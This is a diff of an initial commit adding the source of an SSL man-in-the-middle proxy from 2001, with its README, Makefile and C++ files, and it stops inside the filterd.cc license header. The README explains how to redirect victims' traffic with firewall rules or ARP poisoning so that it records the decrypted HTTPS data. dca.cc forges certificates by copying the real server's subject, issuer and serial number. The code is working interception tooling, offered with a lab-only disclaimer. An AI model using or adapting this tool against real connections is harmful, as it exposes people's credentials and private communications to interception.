initial

20 files changed, 1939 insertions, 0 deletions

diff --git a/other/sslmim/Changelog b/other/sslmim/Changelog
new file mode 100644
index 0000000..6aa16c2
--- /dev/null
+++ b/other/sslmim/Changelog
@@ -0,0 +1,21 @@
+0.62
+----
+
++ Added serialnumber ripper
++ Added VERSION file
+
+0.61
+----
+
++ Minor fixes
+
+0.6
+---
+
++ Added change_name(), now issuer-fake
++ Changes DCA parsing
+
+0.5
+---
+
++ First working DCA version
diff --git a/other/sslmim/LICENSE b/other/sslmim/LICENSE
new file mode 100644
index 0000000..21ab53a
--- /dev/null
+++ b/other/sslmim/LICENSE
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) 2001 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
diff --git a/other/sslmim/Makefile b/other/sslmim/Makefile
new file mode 100644
index 0000000..0b28056
--- /dev/null
+++ b/other/sslmim/Makefile
@@ -0,0 +1,39 @@
+# (C) 2001 by Sebastian Krahmer.
+#
+#
+
+# choose one of:
+# FREEBSD
+# LINUX22
+# LINUX24
+
+CXX=c++
+CFLAGS=-Wall -O2 -c -DLINUX24 #-ansi -pedantic
+
+.SUFFIXES: .o .cc
+
+.cc.o:
+        $(CXX) $(CFLAGS) $<
+
+all: echo filterd mimd cf
+
+cf: session.o certfetch.o
+        $(CXX) certfetch.o session.o -o cf -lssl -lcrypto
+
+filterd: socket.o misc.o filter.o filterd.o
+        $(CXX) socket.o misc.o filter.o filterd.o -o filterd    
+
+mimd:   session.o forward.o misc.o main.o socket.o dca.o
+        $(CXX) session.o forward.o misc.o main.o socket.o  dca.o -o mimd -lssl -lcrypto
+
+clean: 
+        rm -rf *.o
+
+echo:
+        @echo "Make sure you choose the right target-OS by defining either of";
+        @echo "LINUX22 (Linux, kernel 2.2),";
+        @echo "LINUX24 (Linux, kernel 2.4) or";
+        @echo "FREEBSD";
+        @echo "in the Makefile.";
+        @echo
+
diff --git a/other/sslmim/README b/other/sslmim/README
new file mode 100644
index 0000000..292963c
--- /dev/null
+++ b/other/sslmim/README
@@ -0,0 +1,155 @@
+SSL MiM proxy
+-------------
+
+legal stuff:
+
+By running this program you maybe break law in your country.
+This program is ment to understand how crypto (and SSL in special)
+works and how it can be disabled. You should never mount the attack
+on other persons connections.
+
+This program uses library (OpenSSL) Copyright by Eric Young. 
+
+
+How to install
+-------------
+
+mimd/filterd runs only on linux 2.2 to 2.4 (and probably FreeBSD)
+by now.
+This is due to the way of getting the real destination of
+a redirected connection.
+Make sure you installed openssl and its accessible by gcc
+(libs and includes). Then just type 'make' and watch
+whats coming. Play with -I switches until it works. :)
+
+Edit Makefile and say which OS you are going to run mimd on.
+Add LINUX22 for Linux w/ kernel 2.2, LINUX24 and FREEBSD
+for kernel 2.4 and FreeBSD respectively. 
+
+How to run
+----------
+
+This program allows you to mount the so called "Man in the Middle"
+attack against SSL connections. By doing that, "mimd" acts
+as fake-server for the attacked connection. It silently
+records the data sent and forwards it to its real destination
+(probably some https-server). To get in between the two parties,
+you need to set up a port forwarding rule on a machine that
+sits either directly between the two parties (so calld gateway)
+or that is 'made' the gateway by poisoning the arp-cache
+of the client. The rules look like
+
+(Linux, kernel 2.2)
+
+ipchains -A input -s 192.168.0.2 -d 0/0 -j REDIRECT 10000 -p tcp 
+
+as shell command for linux. This will redirect all traffic from 192.168.0.2
+to our so called "filterd" program which sits on port 10000 and looks
+for SSL handshakes (that is when someone tries to start a SSL session).
+So, fire up filterd by
+
+filterd -p 10000
+
+It is now ready to watch whats coming. Add a new rule like
+
+(Linux, kernel 2.2)
+
+ipchains -A input -s 0/0 8888:10000 -d 0/0 994 -j REDIRECT 10001 -p tcp 
+
+which will redirect all traffic sourced from port 8888 up to 10000 and 
+destinated to port 994 (we expect a stunnel server on port 994 for
+example) to local
+port 10001. That are the connections which "filterd" recognized as SSL
+sessions. On port 10001 now we make the real "mimd" listen:
+
+mimd -p 10001 -C certfile -K keyfile
+
+which does the MiM attack itself. For that matter you need to create
+your own private key which is used during attack:
+
+CA.pl -newcert
+
+Which will put the (private) key and the certificate (containing public
+key) into file newreq.pem. So, in most cases certfile equals keyfile.
+CA.pl is shipped with OpenSSL package. Anyway, you need SSL thats clear.
+Make sure you enabled firewalling, forwarding
+and all the neat things in your kernel.
+In the current working directory of "mimd" you will find files
+"mim.*.*.*" which contain the decrypted data (client and server side).
+
+Recognized connections and errors are sys-logged.
+
+Since filterd only understands SSLv3 handshakes you may want
+to run mimd against your own https sessions directly to get SSLv2 too.
+Just set up the firewall-rules propperly and it works very well
+without filterd. I think its clear how to do ...
+
+You may want to see what your netescape is sending along the SSL stream
+to the https-server. 'mimd' is the perfect tool to monitor that
+session, (and its still encrypted by mimd!) and to look
+for suspicious data.
+
+For localhost-testing, you'd need to add rules like this:
+
+ipchains -A input -p tcp -d 0/0 443 -s 0/0 1000:3000 -j REDIRECT 10000
+
+for 2.2 kernels and
+
+iptables -t nat -A OUTPUT -p tcp --sport 1000:3000 --dport 443 -j REDIRECT --to-port 10000
+
+for 2.4 kernels
+
+and start mimd for port 10000. Because of localhost,
+you only redirect ports 1000 to 3000 (which you suspect to come
+from netescape) to mimd. Mimd itself binds to port 8888 and up
+and thus it doesn't loop!
+
+You can use the tool 'cf' to fetch the certificate of a SSL capable server.
+To analyze it, type smt. like 
+
+cf 127.0.0.1 443|openssl x509 -text
+
+which gives you complete certificate text.
+
+
+FreeBSD 4.0 rule looks like
+
+ipfw 200 add fwd 127.0.0.1,10000 tcp from any to any 443
+
+to redirect https traffic to local port 10000.
+(Thanks to smiler.)
+
+DCA
+---
+
+Dynamic Certificate Assembly allows to place
+'apropriate' subject/issuer and serialnumber into X509-certificate
+upon HTTPS-request.
+At best create a certificate/key as described above
+and just fill in Country (C-field). For the rest
+give it a "." which leaves it empty. 'mimd' will
+put in the right data on the fly when invoked with -D switch.
+When using -D without -I, mimd will use subject name etc.
+and put it into corresponding issuer fields. This is good
+to remove issuers where netescape has apropriate public key.
+You can force using real issuer with -I switch. Mimd will then append
+a " " to the OU field, thus making it differ from real
+issuers and most clients won't use the saved key for
+verifying and accept the cert. This way you can tamper with
+connections which are 'protected' by commercial signers.
+
+AGAIN, I ASSUME YOU DO THAT IN YOUR OWN TEST-LABS TO STRENGTH
+SECURITY OR YOU USE THIS DURING PENETRATION TESTINGS.
+IT IS NOT ALLOWED TO MOUNT THIS ATTACK TO OTHER USERS
+CONNECTIONS IF THEY DO NOT AGREE.
+
+
+
+
+CREDITS
+-------
+
+Smiler for BSD firewalling stuff
+anonymous@segfault.net for secnet testlab.
+
+
diff --git a/other/sslmim/VERSION b/other/sslmim/VERSION
new file mode 100644
index 0000000..a4a0c73
--- /dev/null
+++ b/other/sslmim/VERSION
@@ -0,0 +1,3 @@
+0.63
+
+
diff --git a/other/sslmim/certfetch.cc b/other/sslmim/certfetch.cc
new file mode 100644
index 0000000..ea71c09
--- /dev/null
+++ b/other/sslmim/certfetch.cc
@@ -0,0 +1,112 @@
+/*
+ * Copyright (C) 2001 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+#include <stdio.h>
+#include <openssl/ssl.h>
+#include <openssl/bio.h>
+#include <errno.h>
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netdb.h>
+
+#include "session.h"
+
+int main(int argc, char **argv)
+{
+        struct hostent *he;
+        struct sockaddr_in sin;
+        BIO *bio;
+        X509 *x509;
+        int sfd;
+        
+        if (argc < 3) {
+                printf("\ncf -- SSL certfetch (C) 2001 by Sebastian Krahmer\n\n");
+                printf("Usage: %s <host> <port>\n\n", *argv);
+                exit(1);
+        }
+
+        // Usual network stuff
+        if ((sfd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
+                perror("socket");
+                exit(errno);
+        }
+
+        if ((he = gethostbyname(argv[1])) == NULL) {
+                herror("gethostbyname");
+                exit(1);
+        }
+        memset(&sin, 0, sizeof(sin));
+        sin.sin_port = htons(atoi(argv[2]));
+        sin.sin_family = AF_INET;
+        memcpy(&sin.sin_addr.s_addr, he->h_addr, he->h_length);
+
+        if (connect(sfd, (struct sockaddr*)&sin, sizeof(sin)) < 0) {
+                perror("connect");
+                exit(errno);
+        }
+
+        // start client-session
+        CSession *sess = NULL;
+
+        try {
+                sess = new CSession;
+        } catch (int) {
+                fprintf(stderr, "%s", sess->why());
+                exit(1);
+        }
+
+        sess->start();
+        sess->fileno(sfd);
+        if (sess->connect() < 0) {
+                fprintf(stderr, "Host not SSL capable (handshake failed).\n");
+                exit(2);
+        }
+
+        // and lets get the certificate
+        x509 = SSL_get_peer_certificate(sess->ssl());
+
+        if (!x509) {
+                fprintf(stderr, "Host has no cert.\n");
+                exit(3);
+        }
+
+        // just print in readable form. :> 'openssl x509 -text < cert for
+        // analyzation must be done by you.
+        bio = BIO_new_fp(stdout, 0);
+        PEM_write_bio_X509(bio, x509);
+        BIO_flush(bio);
+        
+        return 0;
+}
+        
+                
diff --git a/other/sslmim/dca.cc b/other/sslmim/dca.cc
new file mode 100644
index 0000000..9b42f0e
--- /dev/null
+++ b/other/sslmim/dca.cc
@@ -0,0 +1,234 @@
+/*
+ * Copyright (C) 2001 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+#include "session.h"
+#include "misc.h"
+#include <stdio.h>
+#include <string.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <openssl/ssl.h>
+#include <openssl/bio.h>
+#include <openssl/asn1.h>
+
+using namespace NS_Misc;
+
+extern bool use_subject_for_issuer;
+
+namespace NS_DCA {
+
+#ifndef MBSTRING_ASC
+#warning "You use outdated openssl lib."
+#define MBSTRING_ASC (0x1000|1)
+#endif
+
+// Note that 'subject' can be actually an issuer too.
+// both, subject and issuer change is done by that function
+char *change_name(X509_NAME *subject, char *peer_subject, bool ca_team)
+{
+        struct {
+                char  C[256], ST[256], L[256], O[256], OU[256],
+                      CN[256], Email[256];
+        } sub;
+        int len = 0;
+
+        memset(&sub, 0, sizeof(sub));
+        char *s = peer_subject;
+
+        // begin ugly parsing ...
+        if (strstr(s, "/C=")) {
+                s = strstr(s, "/C=") + 3;
+                len = strchr(s, '/') ? strchr(s, '/') - s : strlen(s);
+                memcpy(sub.C, s, len < 256 ? len : 255);
+                s += len;
+        }
+        if (strstr(s, "/ST=")) {
+                s = strstr(s, "/ST=") + 4;
+                len = strchr(s, '/') ? strchr(s, '/') - s : strlen(s);
+                memcpy(sub.ST, s, len < 256 ? len : 255);
+                s += len;
+        }
+
+        if (strstr(s, "/L=")) {
+                s = strstr(s, "/L=") + 3;
+                len = strchr(s, '/') ? strchr(s, '/') - s : strlen(s);
+                memcpy(sub.L, s, len < 256 ? len : 255);
+                s += len;
+        }
+
+        if (strstr(s, "/O=")) {
+                s = strstr(s, "/O=") + 3;
+                len = strchr(s, '/') ? strchr(s, '/') - s : strlen(s);
+                memcpy(sub.O, s, len < 256 ? len : 255);
+                s += len;
+        }
+
+        if (strstr(s, "/OU=")) {
+                s = strstr(s, "/OU=") + 4;
+                len = strchr(s, '/') ? strchr(s, '/') - s : strlen(s);
+                memcpy(sub.OU, s, len < 256 ? len : 255);
+                s += len;
+        }
+
+        if (strstr(s, "/CN=")) {
+                s = strstr(s, "/CN=") + 4;
+                len = strchr(s, '/') ? strchr(s, '/') - s : strlen(s);
+                memcpy(sub.CN, s, len < 256 ? len : 255);
+                s += len;
+        }
+
+        if (strstr(s, "/Email=")) {
+                s = strstr(s, "/Email=") + 7;
+                len = strchr(s, '/') ? strchr(s, '/') - s : strlen(s);
+                memcpy(sub.Email, s, len < 256 ? len : 255);
+                s += len;
+        }
+
+        if (sub.C[0])
+                X509_NAME_add_entry_by_txt(subject,"C",
+                      MBSTRING_ASC, (unsigned char*)sub.C, -1, -1, -1);
+
+        if (sub.ST[0])
+                X509_NAME_add_entry_by_txt(subject,"ST",
+                      MBSTRING_ASC, (unsigned char*)sub.ST, -1, -1, -1);
+
+        if (sub.L[0])
+                X509_NAME_add_entry_by_txt(subject,"L",
+                      MBSTRING_ASC, (unsigned char*)sub.L, -1, -1, -1);
+
+        if (sub.O[0])
+                X509_NAME_add_entry_by_txt(subject,"O",
+                      MBSTRING_ASC, (unsigned char*)sub.O, -1, -1, -1);
+
+        if (ca_team) {
+                char fake[1024];
+                memset(fake, 0, sizeof(fake));
+                snprintf(fake, sizeof(fake), "%s ", sub.OU);
+                X509_NAME_add_entry_by_txt(subject,"OU",
+                        MBSTRING_ASC, (unsigned char*)fake, //"CA-Team", 
+                        -1, -1, -1);
+        } else {
+                X509_NAME_add_entry_by_txt(subject,"OU",
+                        MBSTRING_ASC, (unsigned char*)sub.OU,
+                        -1, -1, -1);
+        }
+
+        if (sub.CN[0])
+                X509_NAME_add_entry_by_txt(subject,"CN",
+                      MBSTRING_ASC, (unsigned char*)sub.CN, -1, -1, -1);
+
+        if (sub.Email[0])
+                X509_NAME_add_entry_by_txt(subject,"Email",
+                      MBSTRING_ASC, (unsigned char*)sub.Email, -1, -1, -1);
+        
+        return strdup(sub.CN);
+}
+
+
+// Do the somewhat tricky dynamic certificate assembly
+// which puts "apropriate" subject and public key into
+// X509 cert.
+int do_dca(CSession *client, SSession *server)
+{
+        char l[1024];
+        
+        X509 *peer_cert = SSL_get_peer_certificate(client->ssl());
+
+        if (!peer_cert) {
+                log("Nuts, no server-certificate");
+                return 0;
+        }
+
+        char *peer_subject = X509_NAME_oneline(
+            X509_get_subject_name(peer_cert), NULL, 0);
+        char *peer_issuer  = X509_NAME_oneline(
+            X509_get_issuer_name(peer_cert), NULL, 0);
+
+        log(peer_subject);
+        log(peer_issuer);
+
+        // name of algo which is used by server
+        // (WE are client, and so 'client' is connection
+        // to real server
+        const char *algo = SSL_get_cipher(client->ssl());
+
+        snprintf(l, sizeof(l), "Using cipher %s", algo);
+        log(l);
+
+        // what we loaded with load_keys()
+        X509 *our_cert = SSL_get_certificate(server->ssl());
+        
+        X509_NAME *subject = X509_get_subject_name(our_cert);
+        X509_NAME *issuer = X509_get_issuer_name(our_cert);
+
+        // built our cert w/ subject of orig server
+        char *name = change_name(subject, peer_subject, 0);
+        X509_set_subject_name(our_cert, subject);
+
+        // if we must 'touch' issuer, we will adopt the
+        // the subject for the issuer, so that i.e. veri-signed
+        // cert's become self-signed :)
+        if (use_subject_for_issuer)
+                change_name(issuer, peer_subject, 1);
+        else
+                change_name(issuer, peer_issuer, 1);
+
+        X509_set_issuer_name(our_cert, issuer);
+
+        // finally, set serialnumber
+        ASN1_INTEGER *serial = X509_get_serialNumber(peer_cert);
+
+        
+        if (serial)
+                X509_set_serialNumber(our_cert, serial);
+        else
+                log("Nuts, no serialnumber!");
+        
+        if (name) {
+                // save fake-cert
+                char save_cert[1024];
+                snprintf(save_cert, sizeof(save_cert), "./cert_of_%s.%d", 
+                         name, getpid());
+        
+                FILE *f = fopen(save_cert, "w+");
+                if (!f)
+                        return 0;
+                BIO *bio = BIO_new_fp(f, 0);
+                PEM_write_bio_X509(bio, our_cert);
+                BIO_flush(bio);
+                fclose(f);
+                free(name);
+        }
+        return 0;
+}
+
+}; // namespace NS_DCA
+
diff --git a/other/sslmim/dca.h b/other/sslmim/dca.h
new file mode 100644
index 0000000..aecf249
--- /dev/null
+++ b/other/sslmim/dca.h
@@ -0,0 +1,47 @@
+/*
+ * Copyright (C) 2001 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+#ifndef _DCA_H_
+#define _DCA_H_
+
+class CSession;
+class SSession;
+
+// Dynamic Certificate Assembly (DCA)
+namespace NS_DCA {
+
+int do_dca(CSession *, SSession *);
+
+};
+
+#endif  // _DCA_H_
+
diff --git a/other/sslmim/filter.cc b/other/sslmim/filter.cc
new file mode 100644
index 0000000..c39510f
--- /dev/null
+++ b/other/sslmim/filter.cc
@@ -0,0 +1,163 @@
+/*
+ * Copyright (C) 1999/2000 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+#include "misc.h"
+#include "socket.h"
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <sys/time.h>
+#include <unistd.h>
+#include <string.h>
+#include <errno.h>
+
+// since this is entered by new process each call
+// we must make itextern and increased by main()
+extern short inc;
+
+namespace NS_Filter {
+
+const char SSL_HANDSHAKE = 22;
+const char SSL_MAJOR3 = 3;
+const char SSL_CLIENTHELLO = 1;
+
+unsigned short portbase = 8888;
+
+using namespace NS_Misc;
+
+void check_and_forward(int server)
+{
+        struct sockaddr_in dst;
+        int client, r = 0;
+
+        // we are server. get real dest.
+        if (NS_Socket::dstaddr(server, &dst) < 0) {
+                log(NS_Socket::why());
+                die(NULL);
+        }
+        
+        // calc. port to bind to
+        unsigned short port = portbase + (inc++ % (65000-portbase));
+
+        // make connection to real server
+        if ((client = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
+                log("NS_Filter::check_and_forward::socket");
+                die(NULL);
+        }
+
+
+        fd_set rset;
+        FD_ZERO(&rset);
+        FD_SET(server, &rset);
+        struct timeval tv;
+        tv.tv_sec = 2;
+        tv.tv_usec = 0;
+
+        // watch if real client sends some data
+        if (select(server+1, &rset, NULL, NULL, &tv) < 0) {
+                log("NS_Filter::check_and_forward::select");
+                die(NULL);
+        }
+
+        char buf[4096];
+        memset(buf, 0, sizeof(buf));
+
+        // if so, check for SSLv3
+        if (FD_ISSET(server, &rset)) {
+                if ((r = read(server, buf, sizeof(buf))) < 0) {
+                        log("NS_Filter::check_and_forward::read");
+                        die(NULL);
+                }
+                if (buf[0] == SSL_HANDSHAKE &&
+                    buf[1] == SSL_MAJOR3 &&
+                    buf[5] == SSL_CLIENTHELLO &&
+                    buf[9] == SSL_MAJOR3) {     // got SSLv3 ?
+
+                        // bind to special port to signal that
+                        // SSL is coming
+                        if (NS_Socket::bind_local(client, port, false) < 0) {
+                                log(NS_Socket::why());
+                                die(NULL);
+                        }
+                        log("Filtered SSL connection.");
+                }
+        }
+        // Now, do the connect, aftee we bound or not
+        if (connect(client, (struct sockaddr*)&dst, sizeof(dst)) < 0) {
+                log("NS_Filter::check_and_forward::connect");
+                die(NULL);
+        }
+
+        // If there was any data sent by client, flush it now
+        if (FD_ISSET(server, &rset))
+                write(client, buf, r);
+                        
+        int max = server > client ? server : client;
+        for (;;) {
+                // now, do the proxy
+                FD_ZERO(&rset);
+                FD_SET(server, &rset);
+                FD_SET(client, &rset);
+
+                if (select(max+1, &rset, NULL, NULL, NULL) < 0) {
+                        if (errno == EINTR)
+                                continue;
+                        else {
+                                log("NS_Filter::check_and_forward::select()");
+                                die(NULL);
+                        }
+                }
+
+                if (FD_ISSET(client, &rset)) {
+                        r = read(client, buf, sizeof(buf));
+                        if (r <= 0)
+                                break;
+                        if (write(server, buf, r) < 0)
+                                break;
+                }
+                if (FD_ISSET(server, &rset)) {
+                        errno = 0;
+                        r = read(server, buf, sizeof(buf));
+                        if (r <= 0)
+                                break;
+                        if (write(client, buf, r) < 0)
+                                break;
+                }
+        }
+        close(client);
+        return;
+}
+
+}; // namespace
+        
diff --git a/other/sslmim/filter.h b/other/sslmim/filter.h
new file mode 100644
index 0000000..4884414
--- /dev/null
+++ b/other/sslmim/filter.h
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 1999/2000 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+#ifndef _FILTER_H_
+#define _FILTER_H_
+
+namespace NS_Filter {
+
+void check_and_forward(int sock);
+
+}; // namespace
+
+#endif  // _FILTER_H_
+
diff --git a/other/sslmim/filterd.cc b/other/sslmim/filterd.cc
new file mode 100644
index 0000000..2436295
--- /dev/null
+++ b/other/sslmim/filterd.cc
@@ -0,0 +1,100 @@
+/*
+ * Copyright (C) 1999/2000 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
